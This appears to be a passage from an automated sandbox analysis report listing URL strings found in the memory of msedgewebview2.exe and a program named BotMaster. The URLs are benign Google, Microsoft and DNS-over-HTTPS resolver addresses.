                  Source: msedgewebview2.exe, 00000024.00000002.2416057284.0000245400254000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore
                  Source: msedgewebview2.exe, 00000024.00000002.2416057284.0000245400254000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstoreP
                  Source: msedgewebview2.exe, 0000001D.00000002.3693669592.00002DDC00254000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chromereporting-pa.googleapis.com/v1/record
                  Source: msedgewebview2.exe, 00000024.00000002.2416057284.0000245400254000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chromewebstore.google.com/
                  Source: msedgewebview2.exe, 00000024.00000002.2416057284.0000245400254000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chromewebstore.google.com/6EAED1924DB611B6EEF2A664BD077BE7EAD33B8F4EB74897CB187C7633357C2FE8
                  Source: msedgewebview2.exe, 0000001D.00000002.3693669592.00002DDC00254000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chromium-i18n.appspot.com/ssl-aggregate-address/
                  Source: msedgewebview2.exe, 00000020.00000002.3641112283.00001B440000C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chromium.dns.nextdns.io
                  Source: msedgewebview2.exe, 00000020.00000003.2551397552.00001B4400118000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000020.00000003.3242051549.00001B440011C000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000020.00000003.2417345597.00001B440011C000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000020.00000002.3646953393.00001B440011C000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000020.00000003.2389149841.00001B4400118000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000020.00000003.2393797833.00001B4400118000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000020.00000003.2570742173.00001B4400118000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000020.00000003.2572592263.00001B4400118000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000020.00000003.2549778911.00001B4400118000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000020.00000003.2380315982.00001B4400118000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000020.00000003.2395379840.00001B4400118000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000020.00000003.3402831613.00001B440011C000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000020.00000003.2622076580.00001B4400118000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000020.00000003.2324739957.00001B440011C000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000020.00000003.2565835791.00001B4400118000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cleanbrowsing.org/privacy
                  Source: msedgewebview2.exe, 00000024.00000002.2417511260.0000245400298000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://clients2.google.com/service/update2/crx
                  Source: msedgewebview2.exe, 0000001D.00000002.3695947541.00002DDC005B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://code.51.com
                  Source: msedgewebview2.exe, 0000001D.00000002.3691140345.00002DDC000E8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://config.edge.skype.com/config/v1/Edge/117.0.2045.47?clientId=-5575592107330419800&agents=Edge
                  Source: msedgewebview2.exe, 00000020.00000002.3648170740.00001B440016C000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000020.00000002.3641112283.00001B440000C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://crashlogs.whatsapp.net/wa_fls_upload_check?type=crashlog&access_token=1063127757113399%7C745
                  Source: msedgewebview2.exe, 0000001D.00000002.3695947541.00002DDC005B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://daohang.96zxue.com
                  Source: msedgewebview2.exe, 0000001D.00000002.3695947541.00002DDC005B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://de.withtls.net
                  Source: msedgewebview2.exe, 0000001D.00000002.3693534192.00002DDC00240000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001D.00000002.3692619147.00002DDC001BC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://designerapp-dogfood.azurewebsites.net/
                  Source: msedgewebview2.exe, 0000001D.00000002.3693534192.00002DDC00240000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001D.00000002.3692619147.00002DDC001BC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://designerapp-int.azurewebsites.net/
                  Source: msedgewebview2.exe, 0000001D.00000002.3692619147.00002DDC001BC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://designerapp.azurewebsites.net/
                  Source: msedgewebview2.exe, 0000001D.00000002.3692619147.00002DDC001BC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://designerapp.azurewebsites.net/net//
                  Source: msedgewebview2.exe, 0000001D.00000002.3695006796.00002DDC00458000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://designerapp.officeapps.live.com/designerapp/TraceRequest.ashx
                  Source: msedgewebview2.exe, 0000001D.00000002.3695006796.00002DDC00458000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://designerapp.officeapps.live.com/designerapp/TraceRequest.ashxn_value
                  Source: msedgewebview2.exe, 0000001D.00000002.3695006796.00002DDC00458000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://designerapp.officeapps.live.com/designerapp/suggestions.ashx
                  Source: msedgewebview2.exe, 0000001D.00000002.3695947541.00002DDC005B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://dev.tg.wan.360.cn/?
                  Source: Botmaster 5.8 direct.exe, 00000008.00000003.2196945337.00000000042B1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://developer.mozilla.org/docs/Web/HTTP/Headers/Content-Security-Policy/frame-ancestors).
                  Source: Botmaster 5.8 direct.exe, 00000008.00000003.2196945337.00000000042B1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://developer.mozilla.org/docs/Web/HTTP/Headers/X-Frame-Options)
                  Source: msedgewebview2.exe, 00000020.00000002.3643336432.00001B4400088000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://developers.cloudflare.com/1.1.1.1/privacy/public-dns-resolver/
                  Source: msedgewebview2.exe, 00000020.00000002.3641355482.00001B4400024000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://developers.google.com/speed/public-dns/privacy
                  Source: msedgewebview2.exe, 00000020.00000002.3641355482.00001B4400024000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://developers.google.com/speed/public-dns/privacyquery
                  Source: msedgewebview2.exe, 0000001D.00000002.3695947541.00002DDC005B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://discovery.lenovo.com.cn/home
                  Source: msedgewebview2.exe, 0000001D.00000002.3695947541.00002DDC005B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://discovery.lenovo.com.cn/home062291
                  Source: msedgewebview2.exe, 00000020.00000003.2551397552.00001B4400118000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000020.00000003.3242051549.00001B440011C000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000020.00000003.2417345597.00001B440011C000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000020.00000002.3646953393.00001B440011C000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000020.00000003.2389149841.00001B4400118000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000020.00000003.2393797833.00001B4400118000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000020.00000003.2570742173.00001B4400118000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000020.00000003.2572592263.00001B4400118000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000020.00000003.2549778911.00001B4400118000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000020.00000003.2380315982.00001B4400118000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000020.00000003.2395379840.00001B4400118000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000020.00000003.3402831613.00001B440011C000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000020.00000003.2622076580.00001B4400118000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000020.00000003.2324739957.00001B440011C000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000020.00000003.2565835791.00001B4400118000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://dns.google/dns-query
                  Source: msedgewebview2.exe, 00000020.00000003.2551397552.00001B4400118000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000020.00000003.3242051549.00001B440011C000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000020.00000003.2417345597.00001B440011C000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000020.00000002.3646953393.00001B440011C000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000020.00000003.2389149841.00001B4400118000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000020.00000003.2393797833.00001B4400118000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000020.00000003.2570742173.00001B4400118000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000020.00000003.2572592263.00001B4400118000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000020.00000003.2549778911.00001B4400118000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000020.00000003.2380315982.00001B4400118000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000020.00000003.2395379840.00001B4400118000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000020.00000003.3402831613.00001B440011C000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000020.00000003.2622076580.00001B4400118000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000020.00000003.2324739957.00001B440011C000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000020.00000003.2565835791.00001B4400118000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://dns.levonet.sk/dns-query
                  Source: msedgewebview2.exe, 00000020.00000002.3641112283.00001B440000C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://dns.quad9.net/dns-query
                  Source: msedgewebview2.exe, 00000020.00000002.3641112283.00001B440000C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://dns.sb/privacy/
                  Source: msedgewebview2.exe, 00000020.00000002.3641112283.00001B440000C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://dns.sb/privacy/Char
                  Source: msedgewebview2.exe, 00000020.00000003.2551397552.00001B4400118000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000020.00000003.3242051549.00001B440011C000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000020.00000003.2417345597.00001B440011C000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000020.00000002.3646953393.00001B440011C000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000020.00000003.2389149841.00001B4400118000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000020.00000003.2393797833.00001B4400118000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000020.00000003.2570742173.00001B4400118000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000020.00000003.2572592263.00001B4400118000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000020.00000003.2549778911.00001B4400118000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000020.00000003.2380315982.00001B4400118000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000020.00000003.2395379840.00001B4400118000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000020.00000003.3402831613.00001B440011C000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000020.00000003.2622076580.00001B4400118000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000020.00000003.2324739957.00001B440011C000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000020.00000003.2565835791.00001B4400118000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://dns10.quad9.net/dns-query
                  Source: msedgewebview2.exe, 00000020.00000003.2551397552.00001B4400118000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000020.00000003.3242051549.00001B440011C000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000020.00000003.2417345597.00001B440011C000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000020.00000002.3646953393.00001B440011C000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000020.00000003.2389149841.00001B4400118000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000020.00000003.2393797833.00001B4400118000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000020.00000003.2570742173.00001B4400118000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000020.00000003.2572592263.00001B4400118000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000020.00000003.2549778911.00001B4400118000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000020.00000003.2380315982.00001B4400118000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000020.00000003.2395379840.00001B4400118000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000020.00000003.3402831613.00001B440011C000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000020.00000003.2622076580.00001B4400118000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000020.00000003.2324739957.00001B440011C000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000020.00000003.2565835791.00001B4400118000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://dns11.quad9.net/dns-query
                  Source: msedgewebview2.exe, 00000020.00000003.2551397552.00001B4400118000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000020.00000003.3242051549.00001B440011C000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000020.00000003.2417345597.00001B440011C000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000020.00000002.3646953393.00001B440011C000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000020.00000003.2389149841.00001B4400118000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000020.00000003.2393797833.00001B4400118000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000020.00000003.2570742173.00001B4400118000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000020.00000003.2572592263.00001B4400118000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000020.00000003.2549778911.00001B4400118000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000020.00000003.2380315982.00001B4400118000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000020.00000003.2395379840.00001B4400118000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000020.00000003.3402831613.00001B440011C000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000020.00000003.2622076580.00001B4400118000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000020.00000003.2324739957.00001B440011C000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000020.00000003.2565835791.00001B4400118000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://dns64.dns.google/dns-query
                  Source: msedgewebview2.exe, 00000020.00000003.2551397552.00001B4400118000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000020.00000003.3242051549.00001B440011C000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000020.00000003.2417345597.00001B440011C000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000020.00000002.3646953393.00001B440011C000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000020.00000003.2389149841.00001B4400118000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000020.00000003.2393797833.00001B4400118000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000020.00000003.2570742173.00001B4400118000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000020.00000003.2572592263.00001B4400118000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000020.00000003.2549778911.00001B4400118000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000020.00000003.2380315982.00001B4400118000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000020.00000003.2395379840.00001B4400118000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000020.00000003.3402831613.00001B440011C000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000020.00000003.2622076580.00001B4400118000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000020.00000003.2324739957.00001B440011C000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000020.00000003.2565835791.00001B4400118000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://dnsnl.alekberg.net/dns-query
                  Source: BotMaster.exeString found in binary or memory: https://docs.mi
                  Source: BotMaster.exeString found in binary or memory: https://docs.mic
                  Source: BotMaster.exeString found in binary or memory: https://docs.micr
                  Source: BotMaster.exeString found in binary or memory: https://docs.micros
                  Source: BotMaster.exeString found in binary or memory: https://docs.microso
                  Source: BotMaster.exeString found in binary or memory: https://docs.microsof
                  Source: BotMaster.exeString found in binary or memory: https://docs.microsoft
                  Source: BotMaster.exeString found in binary or memory: https://docs.microsoft.c
                  Source: BotMaster.exeString found in binary or memory: https://docs.microsoft.co
                  Source: msedgewebview2.exe, 00000020.00000003.2551397552.00001B4400118000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000020.00000003.3242051549.00001B440011C000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000020.00000003.2417345597.00001B440011C000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000020.00000002.3646953393.00001B440011C000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000020.00000003.2389149841.00001B4400118000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000020.00000003.2393797833.00001B4400118000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000020.00000003.2570742173.00001B4400118000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000020.00000003.2572592263.00001B4400118000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000020.00000003.2549778911.00001B4400118000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000020.00000003.2380315982.00001B4400118000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000020.00000003.2395379840.00001B4400118000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000020.00000003.3402831613.00001B440011C000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000020.00000003.2622076580.00001B4400118000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000020.00000003.2324739957.00001B440011C000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000020.00000003.2565835791.00001B4400118000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://doh-01.spectrum.com/dns-query
                  Source: msedgewebview2.exe, 00000020.00000003.2551397552.00001B4400118000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000020.00000003.3242051549.00001B440011C000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000020.00000003.2417345597.00001B440011C000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000020.00000002.3646953393.00001B440011C000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000020.00000003.2389149841.00001B4400118000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000020.00000003.2393797833.00001B4400118000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000020.00000003.2570742173.00001B4400118000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000020.00000003.2572592263.00001B4400118000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000020.00000003.2549778911.00001B4400118000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000020.00000003.2380315982.00001B4400118000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000020.00000003.2395379840.00001B4400118000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000020.00000003.3402831613.00001B440011C000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000020.00000003.2622076580.00001B4400118000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000020.00000003.2324739957.00001B440011C000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000020.00000003.2565835791.00001B4400118000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://doh-02.spectrum.com/dns-query
                  Source: msedgewebview2.exe, 00000020.00000002.3641355482.00001B4400024000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://doh.cleanbrowsing.org/doh/adult-filter
                  Source: msedgewebview2.exe, 00000020.00000002.3641355482.00001B4400024000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://doh.cleanbrowsing.org/doh/family-filter
                  Source: msedgewebview2.exe, 00000020.00000002.3641355482.00001B4400024000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://doh.cleanbrowsing.org/doh/security-filter
                  Source: msedgewebview2.exe, 00000020.00000002.3641112283.00001B440000C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://doh.cox.net/dns-query
                  Source: msedgewebview2.exe, 00000020.00000003.2551397552.00001B4400118000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000020.00000003.3242051549.00001B440011C000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000020.00000003.2417345597.00001B440011C000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000020.00000002.3646953393.00001B440011C000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000020.00000003.2389149841.00001B4400118000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000020.00000003.2393797833.00001B4400118000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000020.00000003.2570742173.00001B4400118000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000020.00000003.2572592263.00001B4400118000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000020.00000003.2549778911.00001B4400118000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000020.00000003.2380315982.00001B4400118000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000020.00000003.2395379840.00001B4400118000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000020.00000003.3402831613.00001B440011C000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000020.00000003.2622076580.00001B4400118000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000020.00000003.2324739957.00001B440011C000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000020.00000003.2565835791.00001B4400118000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://doh.dns.sb/dns-query
                  Source: msedgewebview2.exe, 00000020.00000002.3641355482.00001B4400024000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://doh.familyshield.opendns.com/dns-query
                  Source: msedgewebview2.exe, 00000020.00000003.2551397552.00001B4400118000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000020.00000003.3242051549.00001B440011C000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000020.00000003.2417345597.00001B440011C000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000020.00000002.3646953393.00001B440011C000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000020.00000003.2389149841.00001B4400118000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000020.00000003.2393797833.00001B4400118000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000020.00000003.2570742173.00001B4400118000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000020.00000003.2572592263.00001B4400118000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000020.00000003.2549778911.00001B4400118000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000020.00000003.2380315982.00001B4400118000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000020.00000003.2395379840.00001B4400118000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000020.00000003.3402831613.00001B440011C000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000020.00000003.2622076580.00001B4400118000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000020.00000003.2324739957.00001B440011C000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000020.00000003.2565835791.00001B4400118000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://doh.opendns.com/dns-query
                  Source: msedgewebview2.exe, 00000020.00000003.2551397552.00001B4400118000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000020.00000003.3242051549.00001B440011C000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000020.00000003.2417345597.00001B440011C000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000020.00000002.3646953393.00001B440011C000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000020.00000003.2389149841.00001B4400118000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000020.00000003.2393797833.00001B4400118000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000020.00000003.2570742173.00001B4400118000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000020.00000003.2572592263.00001B4400118000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000020.00000003.2549778911.00001B4400118000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000020.00000003.2380315982.00001B4400118000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000020.00000003.2395379840.00001B4400118000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000020.00000003.3402831613.00001B440011C000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000020.00000003.2622076580.00001B4400118000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000020.00000003.2324739957.00001B440011C000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000020.00000003.2565835791.00001B4400118000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://doh.quickline.ch/dns-query
                  Source: msedgewebview2.exe, 00000020.00000003.2551397552.00001B4400118000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000020.00000003.3242051549.00001B440011C000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000020.00000003.2417345597.00001B440011C000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000020.00000002.3646953393.00001B440011C000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000020.00000003.2389149841.00001B4400118000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000020.00000003.2393797833.00001B4400118000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000020.00000003.2570742173.00001B4400118000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000020.00000003.2572592263.00001B4400118000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000020.00000003.2549778911.00001B4400118000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000020.00000003.2380315982.00001B4400118000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000020.00000003.2395379840.00001B4400118000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000020.00000003.3402831613.00001B440011C000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000020.00000003.2622076580.00001B4400118000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000020.00000003.2324739957.00001B440011C000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000020.00000003.2565835791.00001B4400118000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://doh.xfinity.com/dns-query
                  Source: msedgewebview2.exe, 00000026.00000003.2465710972.00004B18008A8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://easyauth.edgebrowser.microsoft-falcon.io/
                  Source: msedgewebview2.exe, 00000026.00000003.2465710972.00004B18008A8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://easyauth.edgebrowser.microsoft-staging-falcon.io/
                  Source: msedgewebview2.exe, 00000026.00000003.2465710972.00004B18008A8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://easyauth.edgebrowser.microsoft-testing-falcon.io/
